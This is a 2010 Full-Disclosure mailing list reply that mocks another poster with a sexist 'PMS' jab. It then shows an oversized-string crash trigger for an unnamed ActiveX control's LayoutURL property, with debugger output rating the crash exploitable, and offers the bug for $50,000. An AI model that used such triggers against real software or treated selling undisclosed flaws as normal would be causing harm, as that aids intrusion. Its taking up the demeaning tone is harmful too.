Re: Microsoft Windows Help Centre Handles Malformed Escape Sequences Incorrectly

[musnt live <musntlive () gmail com>]

On Thu, Jun 10, 2010 at 12:18 PM, Susan Bradley <sbradcpa () pacbell net>wrote:

> Nope Mr. Live, other than dealing with .NET updates and a 982331 that keeps
> wanting to have UAC turned off on some Win7/Vistas to get installed, this is
> just my normal calm, try to also consider the consumers and patchers
> viewpoint person today.
>
> musnt live wrote:
>
>
> > On Thu, Jun 10, 2010 at 11:36 AM, Susan Bradley <sbradcpa () pacbell net<mailto:
> > sbradcpa () pacbell net>> wrote:
> >
> >    I'm not an enterprise customer, but I am a mouthy female.
> >
> >
> > Hello Full Disclosure, I'd like to warn you about PMS!

Hello Full Disclosure, please forgive for me my premature mail. What is I
meant to now say is, I would like to warn you about Denial:

http://en.wikipedia.org/wiki/Denial

Denial is a defense mechanism postulated by Sigmund Freud, in which a person
is faced with a fact that is too uncomfortable to accept and rejects it
instead, insisting that it is not true despite what may be overwhelming
evidence.

I once had denial from vulnerable company I will release in the future:

targetFile = "C:\NOFREEBUGNAMES.ocx"
prototype  = "Invoke_Unknown LayoutURL As String"
memberName = "LayoutURL"
progid     = "no.free.bugs"
argCount   = 1

arg1=String(4116, "A")

target.LayoutURL = arg1


0:000> !exploitable -v
HostMachine\HostUser
Executing Processor Architecture is x86
Debuggee is in User Mode
Debuggee is a live user mode debugging session on the local machine
Event Type: Exception
Exception Faulting Address: 0xffffffffdeadbabe
First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005)
Exception Sub-Type: Read Access Violation

Faulting Instruction:XXXXXXXX call dword ptr [ecx]

Exception Hash (Major/Minor): 0x237f6e51.0x456c465d

Stack Trace:
nomore!CBaseBSCB::KickOffDownload+0x82
nomore!URLOpenStreamW+0x41
nomore!URLOpenStreamA+0x94
freebugs!DllUnregisterServer+0x5974
freebugs!BufferComparator::operator=+0x497a
freebugs!msgi_lookup+0x46e61
freebugs!msgi_lookup+0x4f705
vbscript!IDispatchInvoke2+0xb2
vbscript!IDispatchInvoke+0x59
vbscript!InvokeDispatch+0x13c
vbscript!InvokeByName+0x43
vbscript!CScriptRuntime::RunNoEH+0x1158
vbscript!CScriptRuntime::Run+0x64
vbscript!CScriptEntryPoint::Call+0x51
vbscript!CSession::Execute+0xc8
vbscript!COleScript::ExecutePendingScripts+0x146
vbscript!COleScript::SetScriptState+0x14d
scrobj!ScriptEngine::Activate+0x1a
scrobj!ComScriptlet::Inner::StartEngines+0x6e
scrobj!ComScriptlet::Inner::Init+0x156
scrobj!ComScriptlet::New+0x3f
scrobj!ComScriptletConstructor::CreateScriptletFromNode+0x26
scrobj!ComScriptletConstructor::Create+0x4c
wscript!CHost::RunXMLScript+0x277
wscript!CHost::Execute+0x1cb
wscript!CHost::Main+0x38b
wscript!StringCchPrintfA+0xc3f
wscript!WinMain+0x18b
wscript!WinMainCRTStartup+0x5d
kernel32!BaseThreadInitThunk+0xe
ntdll!__RtlUserThreadStart+0x70
ntdll!_RtlUserThreadStart+0x1b
Instruction Address: 0x00000000XXXXXXXX

Description: Read Access Violation on Control Flow
Short Description: ReadAVonControlFlow
Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - Read Access Violation on Control Flow
starting at nomore!CBaseBSCB::KickOffDownload+0x0000000000000082
(Hash=0x237f6e51.0x456c465d)

This bug too exploitable is as is my engrish. Starting bid affects all
Windows versions and server remotely. Starting bid $50,000.00

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/